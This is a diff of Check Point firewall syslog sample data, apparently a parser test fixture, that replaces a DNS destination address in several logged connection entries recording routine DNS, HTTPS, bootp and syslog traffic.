-<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78d,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506189"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57420"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506189"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58753"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506189"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33964"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78d,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506189"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54217"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78d,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506189"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38045"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78d,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506189"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34399"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78d,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506189"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57420"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78d,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"13.48.233.241"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"59002"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506190"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36179"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506190"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36179"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78e,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.140.246"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"57736"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78e,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506190"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38550"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78e,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506190"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38550"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:23:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78e,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.21"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"47064"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506191"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59288"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:23:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506191"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37335"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506191"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59288"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:23:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506191"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37335"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:23:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e78f,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.116"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58862"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:23:17Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e798,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"]
 <134>1 2020-03-29T18:24:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e7c2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52483"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
@@ -3927,8 +3927,8 @@
 <134>1 2020-03-29T18:27:03Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e879,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"]
 <134>1 2020-03-29T18:27:48Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e8a4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.1"]
 <134>1 2020-03-29T18:27:50Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e8a6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T18:28:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e8b5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58244"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:28:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e8b5,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46222"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:28:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e8b5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58244"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:28:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e8b5,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46222"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:28:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e8b5,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"216.58.208.106"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"49038"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:28:07Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e8b9,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"]
